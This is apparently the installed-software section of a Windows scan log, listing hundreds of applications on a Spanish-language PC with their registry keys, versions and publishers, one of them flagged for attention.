Ashampoo Snap 8 (HKLM-x32\...\{C92AB6F1-3B65-B79C-9019-8640F02B7C58}_is1) (Version: 8.0.7 - Ashampoo GmbH & Co. KG)
Asistente Infinitum (HKLM-x32\...\{BD1806A5-1B46-4DDC-A0B6-5F4D48022C78}) (Version: 1.7.0 - Fine Point Technologies, Inc.)
ASOFARMA (HKLM-x32\...\Vademecum IPE_is1) (Version:  - )
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.10 - Atheros Communications Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 8.0.0.171 - Atheros)
AutoPlay Media Studio 8 Personal Edition (HKLM-x32\...\AutoPlay Media Studio 8 Personal Edition) (Version: 8.0.1.1 - Indigo Rose Corporation)
Backup Manager Basic (HKLM-x32\...\{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.29 - NewTech Infosystems) Hidden
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.307.8213 - BlueStack Systems, Inc.)
CambridgeSoft Activation Client (HKLM-x32\...\{E773E0B9-6ABE-4F9E-816C-56B2DD8613B9}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemOffice Ultra 2010 (HKLM-x32\...\{D5402C39-C1C1-48F6-99C2-36C7937EE7EB}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemScript 12.0 (HKLM-x32\...\{E145D9BE-D521-4527-A85D-2B2D47725506}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ENotebook 12.0.1 (HKLM-x32\...\{F596E368-2A1D-4896-AB37-C81BFA4DD011}) (Version: 12.0.1 - CambridgeSoft Corporation)
Camtasia Studio 8 (HKLM-x32\...\{B1F8F5EB-75E2-40C3-9A50-7907F1C910F1}) (Version: 8.0.3.994 - TechSmith Corporation)
CBTL_TwitterImageDownloader (HKLM-x32\...\{2223143E-3B2D-46B4-BD2F-B6DEAED131EF}) (Version: 2.00.0000 - Code Between The Lines)
CCleaner (HKLM\...\CCleaner) (Version: 5.60 - Piriform)
Chicken Invaders 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110209593}) (Version:  - Oberon Media)
CloudNet (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATENCIÓN
CollageIt 1.1.6 (HKLM-x32\...\{D9757258-30B2-496E-86F2-84920C5858E1}_is1) (Version:  - PearlMountain Soft)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
ConvertHelper 3.1.1 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version:  - DownloadHelper)
CoreAAC (HKLM-x32\...\CoreAAC) (Version:  - )
CPUID CPU-Z 1.86 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.86 - CPUID, Inc.)
CyberGhost 6 (HKLM\...\CyberGhost 6_is1) (Version:  - CyberGhost S.R.L.)
CyberLink PowerDVD 8 (HKLM-x32\...\InstallShield_{2BF2E31F-B8BB-40A7-B650-98D28E0F7D47}) (Version: 8.1.3405.50 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dairy Dash (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115053100}) (Version:  - Oberon Media)
Descargador de Video de Apowersoft V6.2.1 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.1 - APOWERSOFT LIMITED)
DjVuLibre+DjView (HKLM-x32\...\DjVuLibre+DjView) (Version: 3.5.24+4.7c - DjVuZone)
Dream Day First Home (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
EaseUS Data Recovery Wizard 6.1 (HKLM-x32\...\EaseUS Data Recovery Wizard 6.1_is1) (Version:  - EaseUS)
Eines de correcció del Microsoft Office 2016: català (HKLM-x32\...\{90160000-001F-0403-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Electrum (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Electrum) (Version: 3.2.2 - Electrum Technologies GmbH)
eSobi v2 (HKLM-x32\...\{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.) Hidden
eSobi v2 (HKLM-x32\...\InstallShield_{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.)
EVEREST Ultimate Edition v4.60 (HKLM-x32\...\EVEREST Ultimate Edition_is1) (Version: 4.60 - Lavalys, Inc.)
ExamDiff Pro 8.0 (8.0.1.2, 64-bit) (HKLM\...\ExamDiff Pro 8.0_is1) (Version: 8.0.1.2 - PrestoSoft LLC)
ExpressVPN (HKLM-x32\...\{4520629e-a2a3-4646-81b1-ed6e089a24be}) (Version: 7.2.3.9028 - ExpressVPN)
ExpressVPN (HKLM-x32\...\{E5B9C3E5-889C-4F22-A959-F4B846EDAB75}) (Version: 7.2.3.9028 - ExpressVPN) Hidden
Farm Frenzy 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11531173}) (Version:  - Oberon Media)
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM-x32\...\{90160000-001F-0456-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
First Class Flurry (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115208410}) (Version:  - Oberon Media)
Free Download Manager (HKLM\...\{43781dff-e0df-49ce-a6d2-47da96a485e7}}_is1) (Version:  - FreeDownloadManager.ORG)
Free Studio version 5.3.5 (HKLM-x32\...\Free Studio_is1) (Version: 5.3.5 - DVDVideoSoft Ltd.)
Galería fotográfica de Windows Live (HKLM-x32\...\{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
GetFLV 9.7.6.9 (HKLM-x32\...\GetFLV_is1) (Version:  - GetFLV, Inc.)
GOM Player (HKLM-x32\...\GOM Player) (Version: 2.3.51.5315 - GOM & Company)
GOM Remote (HKLM-x32\...\GOM Remote) (Version: 2.1.1.5 - GOM & Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 80.0.3987.149 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Granny In Paradise (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110551697}) (Version:  - Oberon Media)
guaca Screen Saver (HKLM-x32\...\guaca) (Version:  - )
Heroes of Hellas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113786380}) (Version:  - Oberon Media)
Herramientas de corrección de Microsoft Office 2016: español (HKLM-x32\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
HP Update (HKLM-x32\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HTTP Analyzer V7.6.4 (HKLM-x32\...\{8DF9C507-AB88-43E4-A4F0-E2E493C4B0CE}_is1) (Version: 7.6.4 - IEInspector Software)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3002 - Acer Incorporated)
ImagXpress (HKLM-x32\...\{A8F2089B-1F79-4BF6-B385-A2C2B0B9A74D}) (Version: 7.0.74.0 - Nero AG) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1892 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
IsoBuster 2.8.5 (HKLM-x32\...\IsoBuster_is1) (Version: 2.8.5 - Smart Projects)
Jaksta Streaming Media Recorder (HKLM\...\{04FE9AD5-1ABC-4297-B2A5-6495D4977B4B}) (Version: 4.1.1 - Applian Technologies)
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.9.2 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 8.9.2 - )
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.2.2.34 - PandoraTV)
Launch Manager (HKLM-x32\...\LManager) (Version: 3.0.03 - Acer Inc.)
Lupas Rename 2000 v5.0 Release (HKLM-x32\...\Lupas Rename 2000_is1) (Version:  - Ivan Anton Albarracin)
Malwarebytes version 4.1.0.56 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.1.0.56 - Malwarebytes)
Marco trabajo apl. capa datos de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{B65527FD-47DD-4A07-9E07-64DA91B0A34A}) (Version: 10.50.1447.4 - Microsoft Corporation)
Mendeley Desktop 1.17.9 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.9 - Mendeley Ltd.)
Merriam Websters Spell Jam (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112662477}) (Version:  - Oberon Media)
Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (HKLM-x32\...\{939C80FA-96C9-44A6-B318-8E7D8BD8481B}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
MestReNova LITE 5.2.5-4731 (HKLM-x32\...\MestReNova LITE) (Version: 5.2.5-4731 - Mestrelab Research S.L.)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - ESN (HKLM-x32\...\{B0DF0057-EF87-471D-A80A-DC1F0463BA19}) (Version: 2.0.50331.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools - ESN (HKLM-x32\...\{4F19E81D-168E-4E0B-A4B7-AA246FBE3FBB}) (Version: 2.0.50414.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{1803A630-3C38-4D2B-9B9A-0CB37243539C}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0100-0C0A-0000-0000000FF1CE}_OMUI.es-es_{D79E9128-A250-4155-BE90-2BE81DE0406A}) (Version:  - Microsoft)
Microsoft Office Excel 2007 Help Actualización (KB963678) (HKLM-x32\...\{90120000-0016-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59E09C3D-4878-47D9-87DB-6D0018026889}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Language Pack 2007 - Spanish/Español (HKLM-x32\...\OMUI.es-es) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Outlook 2007 Help Actualización (KB963677) (HKLM-x32\...\{90120000-001A-0C0A-0000-0000000FF1CE}_OMUI.es-es_{59C244C2-0C37-4E85-8F7E-DBDD3958B694}) (Version:  - Microsoft)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0C0A-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Powerpoint 2007 Help Actualización (KB963669) (HKLM-x32\...\{90120000-0018-0C0A-0000-0000000FF1CE}_OMUI.es-es_{F318245D-05AE-4681-A749-A036CE44AF29}) (Version:  - Microsoft)
Microsoft Office Professional Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Word 2007 Help Actualización (KB963665) (HKLM-x32\...\{90120000-001B-0C0A-0000-0000000FF1CE}_OMUI.es-es_{377BA42A-1C84-45D6-94B8-6D00887D172D}) (Version:  - Microsoft)
Microsoft OneDrive (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\OneDriveSetup.exe) (Version: 17.3.4604.0120 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK - Español (HKLM-x32\...\{8D8C5BD0-7FC7-4680-B527-218F63920E03}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{10E05081-646C-4130-A166-83283A3A0A45}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{12F3060C-64C4-4872-BB3C-4DCBA7877987}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{F188B6ED-4537-4CAC-A4DE-3BD30E6114C6}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{6C239446-F196-44DC-9148-8D912895D097}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{2A78694E-ACFE-4D5A-9B0F-C0EBEFA3F280}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ESN (HKLM\...\{24965A31-311D-462D-BAA8-B482ABA115D8}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{79BF7CB8-1E09-489F-9547-DB3EE8EA3F16}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{46878B08-238C-4F28-9194-9D8604A7F52E}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{CD9B2BA6-F699-4700-81B9-CD28C0BC693C}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{DE63A8FE-80A6-4CA3-ACEA-F954B6370596}) (Version: 10.2.4000.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) es (HKLM\...\{2D6232BE-CDB4-4EE7-AFCB-1541E12041E9}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 es (HKLM-x32\...\{EF948EA2-FA97-4312-BA36-88D76048CCE8}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) es (HKLM\...\{C69733F2-4140-440F-938E-2D47C6CB1C70}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) es (HKLM\...\{1C3998E1-8501-455C-B829-5031520EBC94}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM-x32\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Designtime - 10.0.30319 (HKLM\...\{61B42D05-EBFA-3896-A267-B71CD3025BC5}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.30319 (HKLM\...\{94D70749-4281-39AC-AD90-B56A0E0A402E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.30319 (HKLM-x32\...\{6A86554B-8928-30E4-A53C-D7337689134D}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 (HKLM-x32\...\{206898cc-4b41-4d98-ac28-9f9ae57f91fe}) (Version: 14.0.24123.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{729A3000-BC8A-3B74-BA5D-5068FE12D70C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{817C2DCF-4DD7-3C32-8A8E-7CEFF137E543}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools - ESN Language Pack (HKLM-x32\...\Microsoft Visual Studio Macro Tools - ESN Language Pack) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{38BB21D5-B0D1-41DA-A0B0-1EFB5EF4AAC2}) (Version: 9.7.0621 - Microsoft Corporation)
Modelo de objetos de Microsoft Team Foundation Server 2010 - ESN (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ESN) (Version: 10.0.30319 - Microsoft Corporation)
Movavi Video Converter 19 Premium (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Movavi Video Converter 19 Premium) (Version: 19.3.0 - Movavi)
Mozilla Firefox 74.0 (x64 es-MX) (HKLM\...\Mozilla Firefox 74.0 (x64 es-MX)) (Version: 74.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 74.0.0.7373 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (HKLM-x32\...\{68301905-2DEA-41CE-A4D4-E8B443B099BA}) (Version: 3.1.76.0 - Egis Technology Inc.)
MZ-Tools 3.0 para VBA (HKLM-x32\...\{2B69AD59-FA30-47fc-B950-FA27E7D16A73}_is1) (Version:  - MZTools Software)
NeoDownloader 2.8 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.7 - Neowise Software)
Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG)
NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.5 - Notepad++ Team)
NTI Backup Now 5 (HKLM-x32\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.627 - NewTech Infosystems)
NTI Backup Now Standard (HKLM-x32\...\{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.627 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6623 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6623 - NewTech Infosystems)
Nuance PDF Converter Professional 7 (HKLM\...\{F8001A0F-C0E6-4593-88AB-F2FB726C274E}) (Version: 7.10.6403 - Nuance Communications, Inc)
Objetos de administración de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{6438BDAD-CE12-4D38-B1C4-42F94F08408F}) (Version: 10.50.1447.4 - Microsoft Corporation)
Objetos de administración de Microsoft SQL Server 2008 R2 (x64) (HKLM\...\{2040D407-91F5-48F3-9A81-B084573D0577}) (Version: 10.50.1447.4 - Microsoft Corporation)
Optical Drive Power Management (HKLM-x32\...\{AE09C972-EEB2-4DA5-8090-0FCF54576854}) (Version: 1.01.3002 - Acer Incorporated)
Origin8 (HKLM-x32\...\{D7452A01-9BF9-4FFD-8B2E-650F713AE099}) (Version: 8.00.000 - OriginLab) Hidden
OriginPro 8 (HKLM-x32\...\{A912021A-FEDD-4DA3-8DB4-245EBDA84778}) (Version: 8.00.000 - OriginLab Corporation)
Paint.NET v3.5.11 (HKLM\...\{72EF03F5-0507-4861-9A44-D99FD4C41418}) (Version: 3.61.0 - dotPDN LLC)
Paquete de controladores de Windows - eMPIA Technology Inc, (etAudio) MEDIA  (01/09/2007 2.7.0109.0) (HKLM\...\1849833E0162CE51DBEADAF36FE5A044F926B2FE) (Version: 01/09/2007 2.7.0109.0 - eMPIA Technology Inc,)
Paquete de idioma de Microsoft Visual F# 2.0 Runtime - ESN (HKLM-x32\...\{7CCA8BD3-005C-3195-806B-501E6D3D242B}) (Version: 10.0.30319 - Microsoft Corporation)
Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation)
Paquete de idioma del Visor de Ayuda de Microsoft 3.0 - ESN (HKLM\...\Microsoft Help Viewer 1.0 Language Pack - ESN) (Version: 1.0.30319 - Microsoft Corporation)
PDF Password Remover v3.1 (HKLM-x32\...\PDF Password Remover v3.1_is1) (Version:  - VeryPDF.com Inc)
Picture Merge Genius 2.8 (HKLM-x32\...\Picture Merge Genius_is1) (Version:  - EasyTools,Inc)
Polymath 6.0 (HKLM-x32\...\{95730541-F084-4B2D-92A0-0270E18EA29E}) (Version: 6.00.0204.7 - Polymath Software)
PowerISO (HKLM-x32\...\PowerISO) (Version:  - )
Prerequisite installer (HKLM-x32\...\{3AAB08A3-F129-4BD5-B409-AE674F93759D}) (Version: 12.0.0002 - Nero AG) Hidden
Progress Telerik Fiddler (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Fiddler2) (Version: 5.0.20182.28034 - Telerik)
Proxy Finder (HKLM-x32\...\Proxy Finder) (Version:  - )
Python 2.5 (HKLM-x32\...\{0A2C5854-557E-48C8-835A-3B9F074BDCAA}) (Version: 2.5.150 - Martin v. Löwis)
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Raptor 3 (HKLM-x32\...\Raptor_is1) (Version:  - madmax)
RAR Password Unlocker 4.2.0.0 (HKLM-x32\...\{B789FA51-6A71-408F-92DE-EDE4A517B8F9}_is1) (Version:  - Password Unlocker Studio)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5911 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30093 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM-x32\...\{90160000-001F-0416-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RonyaSoft CD DVD Label Maker 3.02 (HKLM-x32\...\RonyaSoft CD DVD Label Maker) (Version: 3.02 - RonyaSoft)
Samsung Auto Backup (HKLM-x32\...\{821D6F49-1B20-4809-8C73-286CFC52B1B1}) (Version: 4.1.371.0 - Clarus)
Samsung SecretZone (HKLM-x32\...\{66491E5A-7899-4863-A2E9-057E10BCB578}) (Version: 1.00.0000 - Clarus)
